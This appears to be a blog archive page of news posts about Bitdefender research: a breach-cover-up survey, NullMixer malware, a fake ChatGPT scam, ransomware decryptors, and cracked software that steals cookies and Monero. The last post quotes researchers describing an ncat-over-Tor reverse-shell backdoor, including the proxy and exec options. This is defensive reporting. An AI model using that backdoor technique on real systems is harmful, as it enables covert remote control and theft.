Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label Bitdefender. Show all posts

Organizations Struggle with Data Breach Disclosure

A recent survey conducted by cybersecurity firm Bitdefender highlights the ongoing struggle of organizations to handle data breaches and cybersecurity challenges. The survey revealed that a third of organizations have admitted to covering up data breaches, while 42% of IT leaders were instructed to maintain breach confidentiality. This trend of hiding data breaches is alarming as it puts customers' personal information at risk and undermines their trust in the organization.

The survey also highlighted the top cybersecurity concerns for businesses globally, with the most significant challenge being phishing attacks, followed by ransomware and zero-day exploits. These attacks are increasingly sophisticated and can cause significant financial and reputational damage to organizations.

According to Bogdan Botezatu, director of threat research and reporting at Bitdefender, "There is a significant gap between businesses' perceptions of their cybersecurity preparedness and the reality of their protection measures." The survey shows that while organizations are aware of the risks and the importance of cybersecurity, many are not taking sufficient measures to protect their systems and data.

It is essential for organizations to be transparent about data breaches and take necessary precautions to prevent them. They need to prioritize cybersecurity measures and invest in the latest technologies to protect their data from threats. As Botezatu emphasized, "By underestimating their exposure, businesses are not only putting themselves at risk but also their customers."

According to the poll, firms must act quickly to prevent cybersecurity problems and data breaches. In addition to making ensuring companies have sufficient security measures in place, they must be open about any security-related events. Only by implementing these measures can businesses keep the confidence of their customers and safeguard their data from online threats.



NullMixer Campaign: A Threat to Cybersecurity

A new cybersecurity threat has recently emerged in the form of the NullMixer campaign, which is causing concern among experts. The campaign has been found to distribute new polymorphic loaders, a type of malware that poses a significant threat to cybersecurity. This malware has already targeted thousands of endpoints in various countries, including France and Italy, and is constantly evolving to become more advanced and sophisticated.

Bitdefender, a leading cybersecurity company, has been monitoring the NullMixer campaign closely. They report that the malware has evolved over time, becoming more advanced and sophisticated. The new polymorphic loaders have shifted the focus of the malware to Italian and French endpoints, indicating a targeted attack. 

According to Bitdefender, the enhanced NullMixer malware is particularly dangerous because it is polymorphic, which means that it can change its form and structure to avoid detection. The malware can also mutate to evade traditional signature-based antivirus software. As a result, it is difficult to detect and eliminate, making it a significant threat to cybersecurity.

The NullMixer campaign is a reminder of the importance of staying vigilant when it comes to cybersecurity. As cyber threats become more advanced and sophisticated, it is crucial to have up-to-date security measures in place. This includes installing and regularly updating antivirus software, implementing strong passwords, and training employees on best practices for avoiding phishing attacks.

In light of the NullMixer campaign, cybersecurity experts are urging individuals and organizations to be cautious when opening email attachments or clicking on links. They advise that if something seems suspicious or out of the ordinary, it is best to err on the side of caution and avoid clicking on it.

As cybersecurity expert Michael Covington notes, "The best defense against these types of attacks is to stay informed and vigilant. It is essential to keep up with the latest threats and trends in cybersecurity and to take proactive measures to protect yourself and your organization."

The NullMixer campaign with its advanced polymorphic loaders highlights the importance of being proactive and vigilant about cybersecurity. It is crucial to stay informed about the latest threats and trends in cybersecurity and to take necessary measures to protect oneself and organizations from cyber attacks. By being vigilant and implementing robust security measures, individuals and organizations can reduce the risk of becoming a victim of cybercrime.

New Phishing Scam Targets User's With Fake ChatGPT Platform

The general population is fascinated with AI chatbots like OpenAI's ChatGPT. Sadly, the popularity of the AI tool has also attracted scammers who use it to carry out extremely complex investment frauds against naive internet users. Nevertheless, security experts warn that ChatGPT and other AI techniques may be used to rapidly and on a much wider scale produce phishing emails and dangerous code.

Bitdefender Antispam Labs claims that the most recent wave of "AI-powered" scams starts with a straightforward unwanted email. In reality, our researchers were instantly drawn to what seemed to be a harmless marketing ploy, and they went on to uncover a complex fraud operation that poses a threat to participants' wallets and identities.

The initiative is currently focused on Denmark, Germany, Australia, Ireland, and the Netherlands.

How does the Scam Operate?

In the past several weeks, fake ChatGPT apps have appeared on the Google Play and Apple App Stores, promising users weekly or monthly memberships to utilize the service. The con artists behind this specific scheme go above and beyond to deceive customers.

Users who click the email's link are taken to a clone of ChatGPT that tempts them with money-making chances that pay up to $10,000 per month 'just on an exclusive ChatGPT platform.'

The recipient must click on an embedded link to access further information because the email itself is short on specifics. They click on this link to be taken to a bogus ChatGPT chatbot, where they are prompted to invest at least €250 and provide their contact information, including phone number, email address, and card details.

The victim is then given access to a copy of ChatGPT, which varies from the original chatbot in that it provides a limited number of pre-written responses to user inquiries. Only a domain that is blacklisted allows access to this chatbot.

It's nothing unusual for scammers to take advantage of popular internet tools or patterns to trick users. Use only the official website to test out the official ChatGPT and its AI-powered text-generating capabilities. Avoid clicking on links you get in unsolicited mail, and be particularly suspicious of investment schemes distributed on behalf of a corporation, which generally are scams.

Free MortalKombat Ransomware Decryptor Released

An open-source universal decryptor for the newly discovered MortalKombat malware, which encrypts files, has been made available by the Romanian cybersecurity firm Bitdefender. The virus has been employed on dozens of victims in the United States, United Kingdom, Turkey, and the Philippines, as per a recent Cisco analysis.

Emails with malware ZIP attachments containing BAT loader scripts are sent to random users by MortalKombat distributors. When the script is run, it will download and run the Laplas Clipper and ransomware binaries on the computer.

Although it has been identified since 2010, Xorist is disseminated as a ransomware constructor, enabling online threat actors to design and alter their own variant of the malware. The MortalKombat decryptor is a standalone executable that doesn't require installation on affected devices. The user may optionally choose a specific place holding backed-up encrypted data. It offers to scan the entire filesystem to find files infected by MortalKombat.

In addition, Bitdefender said that the malware has a clipboard-monitoring feature that targets users of cryptocurrencies particularly. The emails include references to expired cryptocurrency payments and attachments that resemble CointPayments transaction numbers but conceal the malware payload. The ransomware, which encrypts all of a PC's data, including those in virtual machines and the recycle bin, is downloaded by the software after its launch. It takes the victim's background and replaces it with a Mortal Kombat 11 image, hence the name.

In a study by PCrisk, Cisco discovered a leaked version of the Xorist builder, where the builder interface options closely mirrored an actual Xorist ransomware building interface. The creator creates an executable ransomware file that the attackers can further modify. Notably, MortalKombat was used in recent attacks by an unidentified financially motivated malicious attacker as a part of a phishing operation targeted at multiple companies.

MegaCortex Rasomware Attack: Victims Can Now Restore Stolen Files For Free


Cybersecurity company, Bitdefender, has launched a new tool that would help victims of MegaCortex ransomware unlock their files, offering a sigh of relief to those whose files had been locked for years following the cyberattack.  

MegaCortex Ransomware

The MegaCortex ransomware first came to light in January 2019. It included many interesting characteristics, such as utilizing signed executables as a part of the payload, and the malware's developer was additionally offered security consulting services. 

The ransomware used both automated and manual components in order to attack as many targeted victims as possible. 

Moreover, MegaCortex ransomware may be employing networks that have already been infiltrated in an initial attack using Emotet and Qakbot malware to target businesses rather than individual consumers. 

According to The Malware Wiki, MegaCortex used AES encryption to encrypt user files. The only way to regain access to protected data is through a private key, which victims would need to buy from the hackers, according to a readme file that came with infections. 

The MegaCortex ransomware attack was capable of information theft, file encryption as well disabling usage capability. According to an estimate by TechCrunch, MegaCortex may have infected as many as 1,800 companies around the globe, including a number of “high profile” targets. Although it has been indicated that the figure is likely to be far higher. 

Later, in October 2021, law enforcement detained 12 suspected of being involved in more than 1,800 ransomware assaults in 71 different nations. Police reportedly spent months searching through the data gathered during the arrests, according to TechCrunch. In the end, they discovered individual decryption keys that were utilised to produce and disseminate a program in September of last year to decode files encrypted by the LockerGoga ransomware. 

Free Decryptor Built by Bitdefender 

The free decryptor is being deployed by Bitdefender and the EU’s initiative ‘No More Ransom’ in cooperation with the Zürich Cantonal Police, the Zürich Public Prosecutor’s Office, and Europol. 

The authorities announced in September that 12 culprits have been detained in connection with the Dharma, LockerGoga, and MegaCortex ransomware families. 

The arrests at the time, according to a statement from Zürich's prosecutor, enabled investigators to collect numerous private keys used by the ransomware gang, which would allow victims to restore data that had been previously encrypted using the LockerGaga or MegaCortex virus. A decryptor for LockerGoga was made available by BitDefender last year. 

The cybersecurity company has recently confirmed that the free MegaCortex decryptor is now being made available. The tool will work to unlock files that were encrypted by MegaCortex ransomware and all its variants. It is available to download from Bitdefender and through No More Ransom’s decryption tools portal, which is, in fact, home to 136 other free tools for 165 ransomware variants such as Babuk, DarkSide, Gandcrab, and REvil.  

A New Decryptor by Bitdefender for Victims of LockerGoga Ransomware

 

As part of Bitdefender's official announcement, the company notified that it had released a free decryptor for ransomware called LockerGoga to recover the encrypted files without paying any ransom.
 
The Romania-based cybersecurity firm, Bitdefender released a universal LockGoga decryptor. The company stated in its published announcement, that the new decryptor is a combination of international law agencies, including Bitdefender, Europol, the NoMoreRansom project, the Zurich Public Prosecutor’s office, and the Zurich Cantonal Police. 
  
The new decryptor by Bitdefender is a helping tool for decrypting the files of the victims, free of cost. It uses the path containing pairs of clean-encrypted files and scans the entire system of files or file folders. This decryptor provides a feature called as “backup file”, which comes in handy in case of any problem during the decryption of the files.
 
LockerGoga is a program classified as ransomware, it came into notice in the 2019 cyber-attack against the U.S. and Norway-based companies, where the threat actors targeted high-profile organisations and individuals, including the world's greatest aluminum producer Norsk Hydro, and engineering firm Altran Technologies of France. They used it to encrypt the stored data on computers and blackmailed the users for ransom in exchange for decryption tools.
 
The National Cyber Security Centre (NCSC) reported that this computer infection was used in attacking over 1800 organizations all around the world. Cyberattacks involving various ransomware, one of them being LockerGoga, led to monetary damages of approximately 104 million US Dollars in 71 countries.
 
Around 12 of the attackers involved in the cyber-attack were arrested in October 2021 under an international law enforcement operation for spreading ransomware. In the wake of the arrest of its operator, LockerGoga was dismantled – which also led to the termination of all master private keys used in the encryption. As a result, those victims who did not pay the ransom to the threat actors were left with encrypted files waiting to recover them.
 

Cracked Version of few Software Steal Session Cookies and Monero Cryptocurrency

 

Bitdefender which is a Romania-based cybersecurity organization located in Bucharest has recently cautioned that cracked versions of Microsoft Office and Adobe Photoshop steal the browser session cookies along with Monero cryptocurrency and carry them back from tightwads installing pirated apps. 

While most readers would be familiar, that cracked software is a genuine application that has removed its registration or licensing features. In the days of yore, the cracked software (also known as warez) mainly exchanged through BitTorrent and mostly attracted the freeloaders who enjoyed using a specific suite without paying for the License. 

However, these cracks are priced differently: Bitdefender observed that some versions of both suites have been circulated with malware that captures browser session cookies (or in Firefox, the complete user profile history). It hijacked Monero cryptocurrency deposits and exfiltrated certain information using BitTorrent, after opening the backdoor in the first instance and disabling the machine's firewall. 


"Once executed, the crack drops an instance of ncat.exe (a legitimate tool to send raw data over the network) as well as a Tor proxy," said Bitdefender's Bogdan Botezatu, director of threat research and reporting, and Eduard Budaca the security researcher. They further added that "The tools work together to create a powerful backdoor that communicates through TOR with its command-and-control center: the ncat binary uses the listening port of the TOR proxy ('--proxy 127.0.0.1:9075') and uses the standard '--exec' parameter, which allows all input from the client to be sent to the application and responses to be sent back to the client over the socket (reverse shell behavior)." 


Reportedly, operators take a while to analyze and determine that whether they should rob what they have compromised or not – depending upon the estimated value they could gain out of it. 

In the days when business models became feasible as a service in the cloud, vendors were fully dependent on physical media for delivering to end-users that included the whole program; Immediate and common targets for crackers were copying protections which resulted in unlawful copies of otherwise fully functioning software being sold at a much lower cost. 

“Pirated software is never the way to go, however tempting it may be, as the risks tend to always outweigh the benefits,” sources further noted.